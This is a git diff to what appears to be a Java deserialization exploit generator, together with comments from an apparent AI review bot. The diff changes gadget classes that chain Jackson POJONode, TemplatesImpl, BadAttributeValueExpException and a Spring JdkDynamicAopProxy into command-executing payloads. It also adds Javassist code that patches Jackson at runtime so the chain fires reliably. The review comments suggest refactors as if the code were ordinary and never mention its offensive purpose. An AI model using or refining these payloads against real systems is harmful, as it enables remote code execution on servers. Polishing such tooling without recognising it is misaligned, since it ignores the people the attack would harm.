diff --git a/src/main/java/com/fasterxml/jackson/databind/node/BaseJsonNode.java b/src/main/java/com/fasterxml/jackson/databind/node/BaseJsonNode.java
deleted file mode 100644
index f9af571..0000000
--- a/src/main/java/com/fasterxml/jackson/databind/node/BaseJsonNode.java
+++ /dev/null
@@ -1,68 +0,0 @@
-//
-// Source code recreated from a .class file by IntelliJ IDEA
-// (powered by FernFlower decompiler)
-//
-
-package com.fasterxml.jackson.databind.node;
-
-import com.fasterxml.jackson.core.JsonGenerator;
-import com.fasterxml.jackson.core.JsonParser;
-import com.fasterxml.jackson.core.JsonToken;
-import com.fasterxml.jackson.core.ObjectCodec;
-import com.fasterxml.jackson.databind.JsonNode;
-import com.fasterxml.jackson.databind.SerializerProvider;
-import com.fasterxml.jackson.databind.jsontype.TypeSerializer;
-import java.io.IOException;
-import java.io.Serializable;
-
-public abstract class BaseJsonNode extends JsonNode implements Serializable {
- private static final long serialVersionUID = 1L;
-
-// Object writeReplace() {
-// return NodeSerialization.from(this);
-// }
-
- protected BaseJsonNode() {
- }
-
- public final JsonNode findPath(String fieldName) {
- JsonNode value = this.findValue(fieldName);
- return (JsonNode)(value == null ? MissingNode.getInstance() : value);
- }
-
- public abstract int hashCode();
-
- public JsonNode required(String fieldName) {
- return (JsonNode)this._reportRequiredViolation("Node of type `%s` has no fields", new Object[]{this.getClass().getSimpleName()});
- }
-
- public JsonNode required(int index) {
- return (JsonNode)this._reportRequiredViolation("Node of type `%s` has no indexed values", new Object[]{this.getClass().getSimpleName()});
- }
-
- public JsonParser traverse() {
- return new TreeTraversingParser(this);
- }
-
- public JsonParser traverse(ObjectCodec codec) {
- return new TreeTraversingParser(this, codec);
- }
-
- public abstract JsonToken asToken();
-
- public JsonParser.NumberType numberType() {
- return null;
- }
-
- public abstract void serialize(JsonGenerator var1, SerializerProvider var2) throws IOException;
-
- public abstract void serializeWithType(JsonGenerator var1, SerializerProvider var2, TypeSerializer var3) throws IOException;
-
- public String toString() {
- return InternalNodeMapper.nodeToString(this);
- }
-
- public String toPrettyString() {
- return InternalNodeMapper.nodeToPrettyString(this);
- }
-}
diff --git a/src/main/java/org/gadget/Jackson.java b/src/main/java/org/gadget/Jackson.java
index d802a00..4d5b49c 100644
--- a/src/main/java/org/gadget/Jackson.java
+++ b/src/main/java/org/gadget/Jackson.java
@@ -2,6 +2,9 @@
 import com.fasterxml.jackson.databind.node.POJONode;
 import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import javassist.ClassPool;
+import javassist.CtClass;
+import javassist.CtMethod;
 import org.gadget.inter.Gadget;
 import org.util.TemplateUtils;
@@ -10,6 +13,12 @@
 public class Jackson implements Gadget {
 public Object getObject(String common) throws Exception {
+ ClassPool pool = ClassPool.getDefault();
+ CtClass ctClass0 = pool.get("com.fasterxml.jackson.databind.node.BaseJsonNode");
+ CtMethod writeReplace = ctClass0.getDeclaredMethod("writeReplace");
+ ctClass0.removeMethod(writeReplace);
+ ctClass0.toClass();
+
 TemplatesImpl template = TemplateUtils.getTemplate(common);
 POJONode node = new POJONode(template);
 BadAttributeValueExpException val = new BadAttributeValueExpException(null);
diff --git a/src/main/java/org/gadget/Jackson2.java b/src/main/java/org/gadget/Jackson2.java
index dff4182..e62aa7c 100644
--- a/src/main/java/org/gadget/Jackson2.java
+++ b/src/main/java/org/gadget/Jackson2.java
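Review bot: The five Javassist lines added at the top of `getObject` in `Jackson.java` rewrite `com.fasterxml.jackson.databind.node.BaseJsonNode` for the whole JVM and cannot be undone, yet nothing in the hunk documents that side effect; the same block is repeated verbatim in the first `Jackson2.java` hunk. Because `ClassPool.getDefault()` caches the modified `CtClass`, a second call to either `getObject` in one process would most likely fail at `getDeclaredMethod("writeReplace")`, and `toClass()` is expected to throw if the Jackson class was already loaded. Keeping the block in one shared helper that runs once would remove the duplication, and it should be headed by a comment such as `// Process-wide and irreversible: removes BaseJsonNode.writeReplace, so every Jackson tree node serialized in this JVM afterwards skips NodeSerialization.` The body of `getObject` continues past the end of the hunk.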
@@ -13,12 +13,12 @@
 public class Jackson2 implements Gadget {
 @Override
 public Object getObject(String command) throws Exception {
-// ClassPool pool = ClassPool.getDefault();
-// CtClass ctClass0 = pool.get("com.fasterxml.jackson.databind.node.BaseJsonNode");
-// CtMethod writeReplace = ctClass0.getDeclaredMethod("writeReplace");
-// ctClass0.removeMethod(writeReplace);
-// ctClass0.toClass();
- //利用 JdkDynamicAopProxy 进行封装使其稳定触发
+ ClassPool pool = ClassPool.getDefault();
+ CtClass ctClass0 = pool.get("com.fasterxml.jackson.databind.node.BaseJsonNode");
+ CtMethod writeReplace = ctClass0.getDeclaredMethod("writeReplace");
+ ctClass0.removeMethod(writeReplace);
+ ctClass0.toClass();
+// 利用 JdkDynamicAopProxy 进行封装使其稳定触发
 Class clazz = Class.forName("org.springframework.aop.framework.JdkDynamicAopProxy");
 Constructor cons = clazz.getDeclaredConstructor(AdvisedSupport.class);
 cons.setAccessible(true);
@@ -29,7 +29,7 @@ public Object getObject(String command) throws Exception {
 POJONode jsonNodes = new POJONode(proxyObj);
 BadAttributeValueExpException exp = new BadAttributeValueExpException(null);
- Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
+ Field val = exp.getClass().getDeclaredField("val");
 val.setAccessible(true);
 val.set(exp,jsonNodes);
 return exp;
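Review bot: In the last hunk the new lookup `exp.getClass().getDeclaredField("val")` still resolves the class at run time although the type is fixed at compile time; `Field val = BadAttributeValueExpException.class.getDeclaredField("val");` states the same thing without depending on the instance. In the first hunk the re-added comment `// 利用 JdkDynamicAopProxy 进行封装使其稳定触发` appears to start at column 0 while the statements around it are indented, so it should be re-indented to line up with the `Class clazz = ...` statement it describes. The end of `getObject` lies outside the hunks.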